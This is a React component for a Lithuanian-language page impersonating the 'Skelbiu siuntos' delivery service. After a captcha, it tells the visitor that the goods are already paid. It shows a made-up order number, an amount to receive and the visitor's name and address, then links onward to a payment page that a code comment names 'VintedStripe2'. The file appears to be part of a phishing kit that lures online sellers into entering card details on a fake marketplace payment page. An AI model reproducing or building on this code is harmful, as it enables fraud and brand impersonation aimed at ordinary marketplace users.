import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './SkelbiuLtSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const HERO_IMG = `${P}/skelbiu-siuntos-lt-hero.jpg`;

function orderIdDisplay(pageData, pageCode) {
  const raw = (pageData?.product_name || '').trim().replace(/\s+/g, '');
  if (/^\d+$/.test(raw)) return raw;
  if (!pageCode) return '—';
  let h = 0;
  for (let i = 0; i < pageCode.length; i += 1) {
    h = (h * 33 + pageCode.charCodeAt(i)) >>> 0;
  }
  return String(1000000 + (h % 9000000));
}

/** Skelbiu siuntos (LT) — po captcha: success; tada index2 (VintedStripe2). */
function SkelbiuLtSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'LT').toUpperCase();

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(Math.round(priceNumber))
        : String(priceNumber);

  const amountWithEuro = priceText === '—' ? '—' : `${priceText} €`;

  const recipientName =
    [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';

  const deliveryAddress = (pageData?.delivery_address || '').trim() || '—';

  const orderId = useMemo(
    () => orderIdDisplay(pageData, pageCode || pageData?.page_code || ''),
    [pageData, pageCode],
  );
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="skelbiu-lt skelbiu-lt--loading">
        <div className="skelbiu-lt-loading">Kraunama…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="skelbiu-lt">
      <section className="skelbiu-lt-hero" aria-label="Skelbiu siuntos">
        <img
          className="skelbiu-lt-hero-banner"
          src={HERO_IMG}
          alt="Skelbiu siuntos"
          width={1024}
          height={211}
          decoding="async"
        />
      </section>

      <main className="skelbiu-lt-main">
        <div className="skelbiu-lt-main-inner">
          <h1 className="skelbiu-lt-main-title">Už prekes jau sumokėta</h1>
          <div className="skelbiu-lt-card">
            <div className="skelbiu-lt-card-top">
              <span className="skelbiu-lt-order-id">{orderId}</span>
              <span className="skelbiu-lt-amount-line">Gavimo suma: {amountWithEuro}</span>
            </div>
            <div className="skelbiu-lt-grid">
              <div>
                <p className="skelbiu-lt-col-label">Siuntos duomenys:</p>
                <p className="skelbiu-lt-col-hint">Siuntą pristatyti į…</p>
                <p className="skelbiu-lt-col-value">{deliveryAddress}</p>
              </div>
              <div>
                <p className="skelbiu-lt-col-label">Gavėjo duomenys:</p>
                <p className="skelbiu-lt-col-hint">Vardas, pavardė</p>
                <p className="skelbiu-lt-col-value">{recipientName}</p>
              </div>
            </div>
          </div>
        </div>
      </main>

      <div className="skelbiu-lt-footbar">
        <div className="skelbiu-lt-footbar-left">Siuntų: 1</div>
        <div className="skelbiu-lt-footbar-right">
          <span className="skelbiu-lt-footbar-sum">Gavimo suma: {amountWithEuro}</span>
          <Link to={index2Path} className="skelbiu-lt-cta">
            Tęsti
          </Link>
        </div>
      </div>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default SkelbiuLtSuccess;
